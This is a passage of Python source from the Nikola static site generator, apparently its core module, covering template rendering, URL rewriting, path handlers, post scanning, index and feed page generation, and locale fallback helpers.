except KeyError:
# Find the correct compiler for this files extension
lang_exts_tab = list(self.config['COMPILERS'].items())
langs = [lang for lang, exts in lang_exts_tab if ext in exts or
len([ext_ for ext_ in exts if source_name.endswith(ext_)]) > 0]
if len(langs) != 1:
if len(set(langs)) > 1:
exit("Your file extension->compiler definition is "
"ambiguous.\nPlease remove one of the file extensions "
"from 'COMPILERS' in conf.py\n(The error is in "
"one of {0})".format(', '.join(langs)))
elif len(langs) > 1:
langs = langs[:1]
else:
exit("COMPILERS in conf.py does not tell me how to "
"handle '{0}' extensions.".format(ext))
lang = langs[0]
try:
compile_html = self.compilers[lang]
except KeyError:
exit("Cannot find '{0}' compiler; it might require an extra plugin -- do you have it installed?".format(lang))
self.inverse_compilers[ext] = compile_html
return compile_html
def render_template(self, template_name, output_name, context):
"""Render a template with the global context.
If ``output_name`` is None, will return a string and all URL
normalization will be ignored (including the link:// scheme).
If ``output_name`` is a string, URLs will be normalized and
the resultant HTML will be saved to the named file (path must
start with OUTPUT_FOLDER).
"""
local_context = {}
local_context["template_name"] = template_name
local_context.update(self.GLOBAL_CONTEXT)
local_context.update(context)
for k in self._GLOBAL_CONTEXT_TRANSLATABLE:
local_context[k] = local_context[k](local_context['lang'])
local_context['is_rtl'] = local_context['lang'] in LEGAL_VALUES['RTL_LANGUAGES']
# string, arguments
local_context["formatmsg"] = lambda s, *a: s % a
for h in local_context['template_hooks'].values():
h.context = context
for func in self.config['GLOBAL_CONTEXT_FILLER']:
func(local_context, template_name)
data = self.template_system.render_template(
template_name, None, local_context)
if output_name is None:
return data
assert output_name.startswith(
self.config["OUTPUT_FOLDER"])
url_part = output_name[len(self.config["OUTPUT_FOLDER"]) + 1:]
# Treat our site as if output/ is "/" and then make all URLs relative,
# making the site "relocatable"
src = os.sep + url_part
src = os.path.normpath(src)
# The os.sep is because normpath will change "/" to "\" on windows
src = "/".join(src.split(os.sep))
utils.makedirs(os.path.dirname(output_name))
parser = lxml.html.HTMLParser(remove_blank_text=True)
doc = html5lib.html5parser.parse(data, treebuilder='lxml',
namespaceHTMLElements=False)
doc = lxml.html.document_fromstring(lxml.html.tostring(doc), parser)
self.rewrite_links(doc, src, context['lang'])
data = b'<!DOCTYPE html>\n' + lxml.html.tostring(doc, encoding='utf8', method='html', pretty_print=True)
with open(output_name, "wb+") as post_file:
post_file.write(data)
def rewrite_links(self, doc, src, lang):
"""Replace links in document to point to the right places."""
# First let lxml replace most of them
doc.rewrite_links(lambda dst: self.url_replacer(src, dst, lang), resolve_base_href=False)
# lxml ignores srcset in img and source elements, so do that by hand
objs = list(doc.xpath('(*//img|*//source)'))
for obj in objs:
if 'srcset' in obj.attrib:
urls = [u.strip() for u in obj.attrib['srcset'].split(',')]
urls = [self.url_replacer(src, dst, lang) for dst in urls]
obj.set('srcset', ', '.join(urls))
def url_replacer(self, src, dst, lang=None, url_type=None):
"""Mangle URLs.
* Replaces link:// URLs with real links
* Makes dst relative to src
* Leaves fragments unchanged
* Leaves full URLs unchanged
* Avoids empty links
src is the URL where this link is used
dst is the link to be mangled
lang is used for language-sensitive URLs in link://
url_type is used to determine final link appearance, defaulting to URL_TYPE from config
"""
parsed_src = urlsplit(src)
src_elems = parsed_src.path.split('/')[1:]
dst_url = urlparse(dst)
if lang is None:
lang = self.default_lang
if url_type is None:
url_type = self.config.get('URL_TYPE')
if dst_url.scheme and dst_url.scheme not in ['http', 'https', 'link']:
return dst
# Refuse to replace links that are full URLs.
if dst_url.netloc:
if dst_url.scheme == 'link': # Magic link
dst = self.link(dst_url.netloc, dst_url.path.lstrip('/'), lang)
# Assuming the site is served over one of these, and
# since those are the only URLs we want to rewrite...
else:
if '%' in dst_url.netloc:
# convert lxml percent-encoded garbage to punycode
nl = unquote(dst_url.netloc)
try:
nl = nl.decode('utf-8')
except AttributeError:
# python 3: already unicode
pass
nl = nl.encode('idna')
if isinstance(nl, utils.bytes_str):
nl = nl.decode('latin-1') # so idna stays unchanged
dst = urlunsplit((dst_url.scheme,
nl,
dst_url.path,
dst_url.query,
dst_url.fragment))
return dst
elif dst_url.scheme == 'link': # Magic absolute path link:
dst = dst_url.path
return dst
# Refuse to replace links that consist of a fragment only
if ((not dst_url.scheme) and (not dst_url.netloc) and
(not dst_url.path) and (not dst_url.params) and
(not dst_url.query) and dst_url.fragment):
return dst
# Normalize
dst = urljoin(src, dst)
# Avoid empty links.
if src == dst:
if url_type == 'absolute':
dst = urljoin(self.config['BASE_URL'], dst.lstrip('/'))
return dst
elif url_type == 'full_path':
dst = urljoin(self.config['BASE_URL'], dst.lstrip('/'))
return urlparse(dst).path
else:
return "#"
# Check that link can be made relative, otherwise return dest
parsed_dst = urlsplit(dst)
if parsed_src[:2] != parsed_dst[:2]:
if url_type == 'absolute':
dst = urljoin(self.config['BASE_URL'], dst)
return dst
if url_type in ('full_path', 'absolute'):
dst = urljoin(self.config['BASE_URL'], dst.lstrip('/'))
if url_type == 'full_path':
parsed = urlparse(urljoin(self.config['BASE_URL'], dst.lstrip('/')))
if parsed.fragment:
dst = '{0}#{1}'.format(parsed.path, parsed.fragment)
else:
dst = parsed.path
return dst
# Now both paths are on the same site and absolute
dst_elems = parsed_dst.path.split('/')[1:]
i = 0
for (i, s), d in zip(enumerate(src_elems), dst_elems):
if s != d:
break
# Now i is the longest common prefix
result = '/'.join(['..'] * (len(src_elems) - i - 1) + dst_elems[i:])
if not result:
result = "."
# Don't forget the query part of the link
if parsed_dst.query:
result += "?" + parsed_dst.query
# Don't forget the fragment (anchor) part of the link
if parsed_dst.fragment:
result += "#" + parsed_dst.fragment
assert result, (src, dst, i, src_elems, dst_elems)
return result
def path(self, kind, name, lang=None, is_link=False):
r"""Build the path to a certain kind of page.
These are mostly defined by plugins by registering via the
register_path_handler method, except for slug, post_path, root
and filename which are defined in this class' init method.
Here's some of the others, for historical reasons:
* root (name is ignored)
* tag_index (name is ignored)
* tag (and name is the tag name)
* tag_rss (name is the tag name)
* category (and name is the category name)
* category_rss (and name is the category name)
* archive (and name is the year, or None for the main archive index)
* index (name is the number in index-number)
* rss (name is ignored)
* gallery (name is the gallery name)
* listing (name is the source code file name)
* post_path (name is 1st element in a POSTS/PAGES tuple)
* slug (name is the slug of a post or story)
* filename (name is the source filename of a post/story, in DEFAULT_LANG, relative to conf.py)
The returned value is always a path relative to output, like
"categories/whatever.html"
If is_link is True, the path is absolute and uses "/" as separator
(ex: "/archive/index.html").
If is_link is False, the path is relative to output and uses the
platform's separator.
(ex: "archive\index.html")
"""
if lang is None:
lang = utils.LocaleBorg().current_lang
try:
path = self.path_handlers[kind](name, lang)
path = [os.path.normpath(p) for p in path if p != '.'] # Fix Issue #1028
if is_link:
link = '/' + ('/'.join(path))
index_len = len(self.config['INDEX_FILE'])
if self.config['STRIP_INDEXES'] and \
link[-(1 + index_len):] == '/' + self.config['INDEX_FILE']:
return link[:-index_len]
else:
return link
else:
return os.path.join(*path)
except KeyError:
utils.LOGGER.warn("Unknown path request of kind: {0}".format(kind))
return ""
def post_path(self, name, lang):
"""Link to the destination of an element in the POSTS/PAGES settings.
Example:
link://post_path/posts => /blog
"""
return [_f for _f in [self.config['TRANSLATIONS'][lang],
os.path.dirname(name),
self.config['INDEX_FILE']] if _f]
def root_path(self, name, lang):
"""Link to the current language's root.
Example:
link://root_path => /
link://root_path => /translations/spanish/
"""
d = self.config['TRANSLATIONS'][lang]
if d:
return [d, '']
else:
return []
def slug_path(self, name, lang):
"""A link to a post with given slug, if not ambiguous.
Example:
links://slug/yellow-camaro => /posts/cars/awful/yellow-camaro/index.html
"""
results = [p for p in self.timeline if p.meta('slug') == name]
if not results:
utils.LOGGER.warning("Cannot resolve path request for slug: {0}".format(name))
else:
if len(results) > 1:
utils.LOGGER.warning('Ambiguous path request for slug: {0}'.format(name))
return [_f for _f in results[0].permalink(lang).split('/') if _f]
def filename_path(self, name, lang):
"""Link to post or story by source filename.
Example:
link://filename/manual.txt => /docs/handbook.html
"""
results = [p for p in self.timeline if p.source_path == name]
if not results:
utils.LOGGER.warning("Cannot resolve path request for filename: {0}".format(name))
else:
if len(results) > 1:
utils.LOGGER.error("Ambiguous path request for filename: {0}".format(name))
return [_f for _f in results[0].permalink(lang).split('/') if _f]
def register_path_handler(self, kind, f):
"""Register a path handler."""
if kind in self.path_handlers:
utils.LOGGER.warning('Conflicting path handlers for kind: {0}'.format(kind))
else:
self.path_handlers[kind] = f
def link(self, *args):
"""Create a link."""
url = self.path(*args, is_link=True)
url = utils.encodelink(url)
return url
def abs_link(self, dst, protocol_relative=False):
"""Get an absolute link."""
# Normalize
if dst: # Mako templates and empty strings evaluate to False
dst = urljoin(self.config['BASE_URL'], dst.lstrip('/'))
else:
dst = self.config['BASE_URL']
url = urlparse(dst).geturl()
if protocol_relative:
url = url.split(":", 1)[1]
url = utils.encodelink(url)
return url
def rel_link(self, src, dst):
"""Get a relative link."""
# Normalize
src = urljoin(self.config['BASE_URL'], src)
dst = urljoin(src, dst)
# Avoid empty links.
if src == dst:
return "#"
# Check that link can be made relative, otherwise return dest
parsed_src = urlsplit(src)
parsed_dst = urlsplit(dst)
if parsed_src[:2] != parsed_dst[:2]:
return utils.encodelink(dst)
# Now both paths are on the same site and absolute
src_elems = parsed_src.path.split('/')[1:]
dst_elems = parsed_dst.path.split('/')[1:]
i = 0
for (i, s), d in zip(enumerate(src_elems), dst_elems):
if s != d:
break
else:
i += 1
# Now i is the longest common prefix
url = '/'.join(['..'] * (len(src_elems) - i - 1) + dst_elems[i:])
url = utils.encodelink(url)
return url
def file_exists(self, path, not_empty=False):
"""Check if the file exists. If not_empty is True, it also must not be empty."""
exists = os.path.exists(path)
if exists and not_empty:
exists = os.stat(path).st_size > 0
return exists
def clean_task_paths(self, task):
"""Normalize target paths in the task."""
targets = task.get('targets', None)
if targets is not None:
task['targets'] = [os.path.normpath(t) for t in targets]
return task
def gen_tasks(self, name, plugin_category, doc=''):
"""Generate tasks."""
def flatten(task):
"""Flatten lists of tasks."""
if isinstance(task, dict):
yield task
else:
for t in task:
for ft in flatten(t):
yield ft
task_dep = []
for pluginInfo in self.plugin_manager.getPluginsOfCategory(plugin_category):
for task in flatten(pluginInfo.plugin_object.gen_tasks()):
assert 'basename' in task
task = self.clean_task_paths(task)
if 'task_dep' not in task:
task['task_dep'] = []
task['task_dep'].extend(self.injected_deps[task['basename']])
yield task
for multi in self.plugin_manager.getPluginsOfCategory("TaskMultiplier"):
flag = False
for task in multi.plugin_object.process(task, name):
flag = True
yield self.clean_task_paths(task)
if flag:
task_dep.append('{0}_{1}'.format(name, multi.plugin_object.name))
if pluginInfo.plugin_object.is_default:
task_dep.append(pluginInfo.plugin_object.name)
yield {
'basename': name,
'doc': doc,
'actions': None,
'clean': True,
'task_dep': task_dep
}
def parse_category_name(self, category_name):
"""Parse a category name into a hierarchy."""
if self.config['CATEGORY_ALLOW_HIERARCHIES']:
try:
return utils.parse_escaped_hierarchical_category_name(category_name)
except Exception as e:
utils.LOGGER.error(str(e))
sys.exit(1)
else:
return [category_name] if len(category_name) > 0 else []
def category_path_to_category_name(self, category_path):
"""Translate a category path to a category name."""
if self.config['CATEGORY_ALLOW_HIERARCHIES']:
return utils.join_hierarchical_category_path(category_path)
else:
return ''.join(category_path)
def _add_post_to_category(self, post, category_name):
"""Add a post to a category."""
category_path = self.parse_category_name(category_name)
current_path = []
current_subtree = self.category_hierarchy
for current in category_path:
current_path.append(current)
if current not in current_subtree:
current_subtree[current] = {}
current_subtree = current_subtree[current]
self.posts_per_category[self.category_path_to_category_name(current_path)].append(post)
def _sort_category_hierarchy(self):
"""Sort category hierarchy."""
# First create a hierarchy of TreeNodes
self.category_hierarchy_lookup = {}
def create_hierarchy(cat_hierarchy, parent=None):
"""Create category hierarchy."""
result = []
for name, children in cat_hierarchy.items():
node = utils.TreeNode(name, parent)
node.children = create_hierarchy(children, node)
node.category_path = [pn.name for pn in node.get_path()]
node.category_name = self.category_path_to_category_name(node.category_path)
self.category_hierarchy_lookup[node.category_name] = node
if node.category_name not in self.config.get('HIDDEN_CATEGORIES'):
result.append(node)
return natsort.natsorted(result, key=lambda e: e.name, alg=natsort.ns.F | natsort.ns.IC)
root_list = create_hierarchy(self.category_hierarchy)
# Next, flatten the hierarchy
self.category_hierarchy = utils.flatten_tree_structure(root_list)
def scan_posts(self, really=False, ignore_quit=False, quiet=False):
"""Scan all the posts.
The `quiet` option is ignored.
"""
if self._scanned and not really:
return
# Reset things
self.posts = []
self.all_posts = []
self.posts_per_year = defaultdict(list)
self.posts_per_month = defaultdict(list)
self.posts_per_tag = defaultdict(list)
self.posts_per_category = defaultdict(list)
self.tags_per_language = defaultdict(list)
self.category_hierarchy = {}
self.post_per_file = {}
self.timeline = []
self.pages = []
for p in self.plugin_manager.getPluginsOfCategory('PostScanner'):
timeline = p.plugin_object.scan()
# FIXME: can there be conflicts here?
self.timeline.extend(timeline)
quit = False
# Classify posts per year/tag/month/whatever
slugged_tags = set([])
for post in self.timeline:
if post.use_in_feeds:
self.posts.append(post)
self.posts_per_year[str(post.date.year)].append(post)
self.posts_per_month[
'{0}/{1:02d}'.format(post.date.year, post.date.month)].append(post)
for tag in post.alltags:
_tag_slugified = utils.slugify(tag)
if _tag_slugified in slugged_tags:
if tag not in self.posts_per_tag:
# Tags that differ only in case
other_tag = [existing for existing in self.posts_per_tag.keys() if utils.slugify(existing) == _tag_slugified][0]
utils.LOGGER.error('You have tags that are too similar: {0} and {1}'.format(tag, other_tag))
utils.LOGGER.error('Tag {0} is used in: {1}'.format(tag, post.source_path))
utils.LOGGER.error('Tag {0} is used in: {1}'.format(other_tag, ', '.join([p.source_path for p in self.posts_per_tag[other_tag]])))
quit = True
else:
slugged_tags.add(utils.slugify(tag))
self.posts_per_tag[tag].append(post)
for lang in self.config['TRANSLATIONS'].keys():
self.tags_per_language[lang].extend(post.tags_for_language(lang))
self._add_post_to_category(post, post.meta('category'))
if post.is_post:
# unpublished posts
self.all_posts.append(post)
else:
self.pages.append(post)
for lang in self.config['TRANSLATIONS'].keys():
dest = post.destination_path(lang=lang)
src_dest = post.destination_path(lang=lang, extension=post.source_ext())
if dest in self.post_per_file:
utils.LOGGER.error('Two posts are trying to generate {0}: {1} and {2}'.format(
dest,
self.post_per_file[dest].source_path,
post.source_path))
quit = True
if (src_dest in self.post_per_file) and self.config['COPY_SOURCES']:
utils.LOGGER.error('Two posts are trying to generate {0}: {1} and {2}'.format(
src_dest,
self.post_per_file[dest].source_path,
post.source_path))
quit = True
self.post_per_file[dest] = post
self.post_per_file[src_dest] = post
# deduplicate tags_per_language
self.tags_per_language[lang] = list(set(self.tags_per_language[lang]))
# Sort everything.
for thing in self.timeline, self.posts, self.all_posts, self.pages:
thing.sort(key=lambda p: (p.date, p.source_path))
thing.reverse()
self._sort_category_hierarchy()
for i, p in enumerate(self.posts[1:]):
p.next_post = self.posts[i]
for i, p in enumerate(self.posts[:-1]):
p.prev_post = self.posts[i + 1]
self._scanned = True
if not self.quiet:
print("done!", file=sys.stderr)
if quit and not ignore_quit:
sys.exit(1)
signal('scanned').send(self)
def generic_page_renderer(self, lang, post, filters, context=None):
"""Render post fragments to final HTML pages."""
utils.LocaleBorg().set_locale(lang)
context = context.copy() if context else {}
deps = post.deps(lang) + \
self.template_system.template_deps(post.template_name)
deps.extend(utils.get_asset_path(x, self.THEMES) for x in ('bundles', 'parent', 'engine'))
deps = list(filter(None, deps))
context['post'] = post
context['lang'] = lang
context['title'] = post.title(lang)
context['description'] = post.description(lang)
context['permalink'] = post.permalink(lang)
if 'pagekind' not in context:
context['pagekind'] = ['generic_page']
if post.use_in_feeds:
context['enable_comments'] = True
else:
context['enable_comments'] = self.config['COMMENTS_IN_STORIES']
extension = self.get_compiler(post.source_path).extension()
output_name = os.path.join(self.config['OUTPUT_FOLDER'],
post.destination_path(lang, extension))
deps_dict = copy(context)
deps_dict.pop('post')
if post.prev_post:
deps_dict['PREV_LINK'] = [post.prev_post.permalink(lang)]
if post.next_post:
deps_dict['NEXT_LINK'] = [post.next_post.permalink(lang)]
deps_dict['OUTPUT_FOLDER'] = self.config['OUTPUT_FOLDER']
deps_dict['TRANSLATIONS'] = self.config['TRANSLATIONS']
deps_dict['global'] = self.GLOBAL_CONTEXT
deps_dict['comments'] = context['enable_comments']
for k, v in self.GLOBAL_CONTEXT['template_hooks'].items():
deps_dict['||template_hooks|{0}||'.format(k)] = v._items
for k in self._GLOBAL_CONTEXT_TRANSLATABLE:
deps_dict[k] = deps_dict['global'][k](lang)
deps_dict['navigation_links'] = deps_dict['global']['navigation_links'](lang)
if post:
deps_dict['post_translations'] = post.translated_to
task = {
'name': os.path.normpath(output_name),
'file_dep': sorted(deps),
'targets': [output_name],
'actions': [(self.render_template, [post.template_name,
output_name, context])],
'clean': True,
'uptodate': [config_changed(deps_dict, 'nikola.nikola.Nikola.generic_page_renderer')] + post.deps_uptodate(lang),
}
yield utils.apply_filters(task, filters)
def generic_post_list_renderer(self, lang, posts, output_name,
template_name, filters, extra_context):
"""Render pages with lists of posts."""
deps = []
deps += self.template_system.template_deps(template_name)
uptodate_deps = []
for post in posts:
deps += post.deps(lang)
uptodate_deps += post.deps_uptodate(lang)
context = {}
context["posts"] = posts
context["title"] = self.config['BLOG_TITLE'](lang)
context["description"] = self.config['BLOG_DESCRIPTION'](lang)
context["lang"] = lang
context["prevlink"] = None
context["nextlink"] = None
context.update(extra_context)
deps_context = copy(context)
deps_context["posts"] = [(p.meta[lang]['title'], p.permalink(lang)) for p in
posts]
deps_context["global"] = self.GLOBAL_CONTEXT
for k, v in self.GLOBAL_CONTEXT['template_hooks'].items():
deps_context['||template_hooks|{0}||'.format(k)] = v._items
for k in self._GLOBAL_CONTEXT_TRANSLATABLE:
deps_context[k] = deps_context['global'][k](lang)
deps_context['navigation_links'] = deps_context['global']['navigation_links'](lang)
task = {
'name': os.path.normpath(output_name),
'targets': [output_name],
'file_dep': sorted(deps),
'actions': [(self.render_template, [template_name, output_name,
context])],
'clean': True,
'uptodate': [config_changed(deps_context, 'nikola.nikola.Nikola.generic_post_list_renderer')] + uptodate_deps
}
return utils.apply_filters(task, filters)
def generic_index_renderer(self, lang, posts, indexes_title, template_name, context_source, kw, basename, page_link, page_path, additional_dependencies=[]):
"""Create an index page.
lang: The language
posts: A list of posts
indexes_title: Title
template_name: Name of template file
context_source: This will be copied and extended and used as every
page's context
kw: An extended version will be used for uptodate dependencies
basename: Basename for task
page_link: A function accepting an index i, the displayed page number,
the number of pages, and a boolean force_addition
which creates a link to the i-th page (where i ranges
between 0 and num_pages-1). The displayed page (between 1
and num_pages) is the number (optionally) displayed as
'page %d' on the rendered page. If force_addition is True,
the appendum (inserting '-%d' etc.) should be done also for
i == 0.
page_path: A function accepting an index i, the displayed page number,
the number of pages, and a boolean force_addition,
which creates a path to the i-th page. All arguments are
as the ones for page_link.
additional_dependencies: a list of dependencies which will be added
to task['uptodate']
"""
# Update kw
kw = kw.copy()
kw["tag_pages_are_indexes"] = self.config['TAG_PAGES_ARE_INDEXES']
kw["index_display_post_count"] = self.config['INDEX_DISPLAY_POST_COUNT']
kw["index_teasers"] = self.config['INDEX_TEASERS']
kw["indexes_pages"] = self.config['INDEXES_PAGES'](lang)
kw["indexes_pages_main"] = self.config['INDEXES_PAGES_MAIN']
kw["indexes_static"] = self.config['INDEXES_STATIC']
kw['indexes_prety_page_url'] = self.config["INDEXES_PRETTY_PAGE_URL"]
kw['demote_headers'] = self.config['DEMOTE_HEADERS']
kw['generate_atom'] = self.config["GENERATE_ATOM"]
kw['generate_rss'] = self.config["GENERATE_RSS"]
kw['feed_link_append_query'] = self.config["FEED_LINKS_APPEND_QUERY"]
kw['currentfeed'] = None
kw['feed_enclosure'] = self.config['FEED_ENCLOSURE']
kw['feed_previewimage_default'] = self.config['FEED_PREVIEWIMAGE_DEFAULT']
kw['feed_push'] = self.config['FEED_PUSH']
kw['blog_description'] = self.config['BLOG_DESCRIPTION']
kw['site_url'] = self.config['SITE_URL']
kw['base_url'] = self.config['BASE_URL']
# Split in smaller lists
lists = []
if kw["indexes_static"]:
lists.append(posts[:kw["index_display_post_count"]])
posts = posts[kw["index_display_post_count"]:]
while posts:
lists.append(posts[-kw["index_display_post_count"]:])
posts = posts[:-kw["index_display_post_count"]]
else:
while posts:
lists.append(posts[:kw["index_display_post_count"]])
posts = posts[kw["index_display_post_count"]:]
num_pages = len(lists)
if kw['generate_atom'] or kw['generate_rss']:
description = context_source.get('description', None)
if description is None:
description = kw['blog_description'](lang)
atom_currentlink = None
atom_archprev = None
atom_archnext = None
rss_currentlink = None
rss_archprev = None
rss_archnext = None
pagekind = context_source.get('pagekind')
if pagekind and 'archive_page' in pagekind:
archivefeed = context_source.get('archivefeed')
if kw['generate_atom']:
atom_currentlink = self.link("atom", None, lang)
if archivefeed:
atom_archprev = archivefeed[0]
atom_archnext = archivefeed[1]
if kw['generate_rss']:
rss_currentlink = self.link("rss", None, lang)
if archivefeed:
rss_archprev = archivefeed[2]
rss_archnext = archivefeed[3]
atom_firstlink = None
atom_lastlink = None
rss_firstlink = None
rss_lastlink = None
if num_pages > 1:
if kw['indexes_static']:
first = 1
last = 0
else:
first = num_pages - 1
last = 0
firstpages_i = utils.get_displayed_page_number(first, num_pages,
self)
lastpages_i = utils.get_displayed_page_number(last, num_pages,
self)
if kw['generate_atom']:
atom_firstlink = page_link(first, firstpages_i, num_pages,
False, extension=".atom")
atom_lastlink = page_link(last, lastpages_i, num_pages,
False, extension=".atom")
if kw['generate_rss']:
rss_firstlink = page_link(first, firstpages_i, num_pages,
False, extension=".xml")
rss_lastlink = page_link(last, lastpages_i, num_pages,
False, extension=".xml")
for i, post_list in enumerate(lists):
context = context_source.copy()
if 'pagekind' not in context:
context['pagekind'] = ['index']
ipages_i = utils.get_displayed_page_number(i, num_pages, self)
if kw["indexes_pages"]:
indexes_pages = kw["indexes_pages"] % ipages_i
else:
if kw["indexes_pages_main"]:
ipages_msg = "page %d"
else:
ipages_msg = "old posts, page %d"
indexes_pages = " (" + \
kw["messages"][lang][ipages_msg] % ipages_i + ")"
if i > 0 or kw["indexes_pages_main"]:
context["title"] = indexes_title + indexes_pages
else:
context["title"] = indexes_title
context["prevlink"] = None
context["nextlink"] = None
context['index_teasers'] = kw['index_teasers']
prevlink = None
nextlink = None
if kw["indexes_static"]:
if i > 0:
if i < num_pages - 1:
prevlink = i + 1
elif i == num_pages - 1:
prevlink = 0
if num_pages > 1:
if i > 1:
nextlink = i - 1
elif i == 0:
nextlink = num_pages - 1
else:
if i > 0:
prevlink = i - 1
if i < num_pages - 1:
nextlink = i + 1
if prevlink is not None:
# the opposite direction...
context["prevlink"] = page_link(prevlink,
utils.get_displayed_page_number(prevlink, num_pages, self),
num_pages, False)
if nextlink is not None:
# the opposite direction...
context["nextlink"] = page_link(nextlink,
utils.get_displayed_page_number(nextlink, num_pages, self),
num_pages, False)
context["permalink"] = page_link(i, ipages_i, num_pages, False)
output_name = os.path.join(kw['output_folder'], page_path(i, ipages_i, num_pages, False))
task = self.generic_post_list_renderer(
lang,
post_list,
output_name,
template_name,
kw['filters'],
context,
)
task['uptodate'] = task['uptodate'] + [utils.config_changed(kw, 'nikola.nikola.Nikola.generic_index_renderer')] + additional_dependencies
task['basename'] = basename
yield task
if kw['generate_atom'] or kw['generate_rss']:
targets = []
atom_path = None
atom_output_name = None
atom_prevlink = None
atom_nextlink = None
if kw['generate_atom']:
atom_path = page_link(i, ipages_i, num_pages, False,
extension=".atom")
atom_output_name = os.path.join(kw['output_folder'],
atom_path.lstrip('/'))
targets.append(atom_output_name)
if nextlink is not None:
atom_prevlink = page_link(
nextlink,
utils.get_displayed_page_number(nextlink, num_pages,
self),
num_pages, False, extension=".atom")
elif atom_currentlink and atom_archprev:
atom_prevlink = atom_archprev
if prevlink is not None:
atom_nextlink = page_link(
prevlink,
utils.get_displayed_page_number(prevlink, num_pages,
self),
num_pages, False, extension=".atom")
elif atom_currentlink and atom_archnext:
atom_nextlink = atom_archnext
rss_path = None
rss_output_name = None
rss_prevlink = None
rss_nextlink = None
if kw['generate_rss']:
rss_path = page_link(i, ipages_i, num_pages, False,
extension=".xml")
rss_output_name = os.path.join(kw['output_folder'],
rss_path.lstrip('/'))
targets.append(rss_output_name)
if nextlink is not None:
rss_prevlink = page_link(
nextlink,
utils.get_displayed_page_number(nextlink, num_pages,
self),
num_pages, False, extension=".xml")
elif rss_currentlink and rss_archprev:
rss_prevlink = rss_archprev
if prevlink is not None:
rss_nextlink = page_link(
prevlink,
utils.get_displayed_page_number(prevlink, num_pages,
self),
num_pages, False, extension=".xml")
elif rss_currentlink and rss_archnext:
rss_nextlink = rss_archnext
feed_task = {
'basename': basename,
'name': lang + ':' + ':'.join(targets),
'actions': [(self.feedutil.gen_feed_generator,
(lang, post_list, urljoin(
kw['base_url'],
context["permalink"].lstrip('/')),
indexes_title, description,
atom_output_name, atom_path,
rss_output_name, rss_path,
atom_nextlink, atom_prevlink,
atom_firstlink, atom_lastlink,
rss_nextlink, rss_prevlink,
rss_firstlink, rss_lastlink,
atom_currentlink, rss_currentlink))],
'targets': targets,
'file_dep': [output_name],
'clean': True,
'uptodate': [utils.config_changed(kw, 'nikola.nikola.Nikola.gen_feed_generator')] + additional_dependencies
}
yield feed_task
if kw["indexes_pages_main"] and kw['indexes_prety_page_url'](lang):
# create redirection
output_name = os.path.join(kw['output_folder'], page_path(0, utils.get_displayed_page_number(0, num_pages, self), num_pages, True))
link = page_link(0, utils.get_displayed_page_number(0, num_pages, self), num_pages, False)
yield utils.apply_filters({
'basename': basename,
'name': output_name,
'targets': [output_name],
'actions': [(utils.create_redirect, (output_name, link))],
'clean': True,
'uptodate': [utils.config_changed(kw, 'nikola.nikola.Nikola.generic_index_renderer')],
}, kw["filters"])
def __repr__(self):
"""Representation of a Nikola site."""
return '<Nikola Site: {0!r}>'.format(self.config['BLOG_TITLE']())
def sanitized_locales(locale_fallback, locale_default, locales, translations):
"""Sanitize all locales availble in Nikola.
There will be one locale for each language in translations.
Locales for languages not in translations are ignored.
An explicit locale for a language can be specified in locales[language].
Locales at the input must be in the string style (like 'en', 'en.utf8'), and
the string can be unicode or bytes; at the output will be of type str, as
required by locale.setlocale.
Explicit but invalid locales are replaced with the sanitized locale_fallback
Languages with no explicit locale are set to
the sanitized locale_default if it was explicitly set
sanitized guesses compatible with v 6.0.4 if locale_default was None
NOTE: never use locale.getlocale() , it can return values that
locale.setlocale will not accept in Windows XP, 7 and pythons 2.6, 2.7, 3.3
Examples: "Spanish", "French" can't do the full circle set / get / set
"""
if sys.platform != 'win32':
workaround_empty_LC_ALL_posix()
# locales for languages not in translations are ignored
extras = set(locales) - set(translations)
if extras:
msg = 'Unexpected languages in LOCALES, ignoring them: {0}'
utils.LOGGER.warn(msg.format(', '.join(extras)))
for lang in extras:
del locales[lang]
# py2x: get/setlocale related functions require the locale string as a str
# so convert
locale_fallback = str(locale_fallback) if locale_fallback else None
locale_default = str(locale_default) if locale_default else None
for lang in locales:
locales[lang] = str(locales[lang])
locale_fallback = valid_locale_fallback(locale_fallback)
# explicit but invalid locales are replaced with the sanitized locale_fallback
for lang in locales:
if not is_valid_locale(locales[lang]):
msg = 'Locale {0} for language {1} not accepted by python locale.'
utils.LOGGER.warn(msg.format(locales[lang], lang))
locales[lang] = locale_fallback
# languages with no explicit locale
missing = set(translations) - set(locales)
if locale_default:
# are set to the sanitized locale_default if it was explicitly set
if not is_valid_locale(locale_default):
msg = 'LOCALE_DEFAULT {0} could not be set, using {1}'
utils.LOGGER.warn(msg.format(locale_default, locale_fallback))
locale_default = locale_fallback
for lang in missing:
locales[lang] = locale_default
else:
# are set to sanitized guesses compatible with v 6.0.4 in Linux-Mac (was broken in Windows)
if sys.platform == 'win32':
guess_locale_fom_lang = guess_locale_from_lang_windows
else:
guess_locale_fom_lang = guess_locale_from_lang_posix
for lang in missing:
locale_n = guess_locale_fom_lang(lang)
if not locale_n:
locale_n = locale_fallback
msg = "Could not guess locale for language {0}, using locale {1}"
utils.LOGGER.warn(msg.format(lang, locale_n))
locales[lang] = locale_n
return locale_fallback, locale_default, locales
def is_valid_locale(locale_n):
"""Check if locale (type str) is valid."""
try:
locale.setlocale(locale.LC_ALL, locale_n)
return True
except locale.Error:
return False
def valid_locale_fallback(desired_locale=None):
"""Provide a default fallback_locale, a string that locale.setlocale will accept.
If desired_locale is provided must be of type str for py2x compatibility
"""
# Whenever fallbacks change, adjust test TestHarcodedFallbacksWork
candidates_windows = [str('English'), str('C')]
candidates_posix = [str('en_US.UTF-8'), str('C')]
candidates = candidates_windows if sys.platform == 'win32' else candidates_posix
if desired_locale:
candidates = list(candidates)
candidates.insert(0, desired_locale)
found_valid = False
for locale_n in candidates:
found_valid = is_valid_locale(locale_n)
if found_valid:
break
if not found_valid:
msg = 'Could not find a valid fallback locale, tried: {0}'
utils.LOGGER.warn(msg.format(candidates))
elif desired_locale and (desired_locale != locale_n):
msg = 'Desired fallback locale {0} could not be set, using: {1}'
utils.LOGGER.warn(msg.format(desired_locale, locale_n))
return locale_n
def guess_locale_from_lang_windows(lang):
"""Guess a locale, basing on Windows language."""
locale_n = str(LEGAL_VALUES['_WINDOWS_LOCALE_GUESSES'].get(lang, None))
if not is_valid_locale(locale_n):
locale_n = None
return locale_n
def guess_locale_from_lang_posix(lang):
"""Guess a locale, basing on POSIX system language."""
# compatibility v6.0.4
if is_valid_locale(str(lang)):
locale_n = str(lang)
else:
# this works in Travis when locale support set by Travis suggestion
locale_n = str((locale.normalize(lang).split('.')[0]) + '.UTF-8')
if not is_valid_locale(locale_n):
# http://thread.gmane.org/gmane.comp.web.nikola/337/focus=343
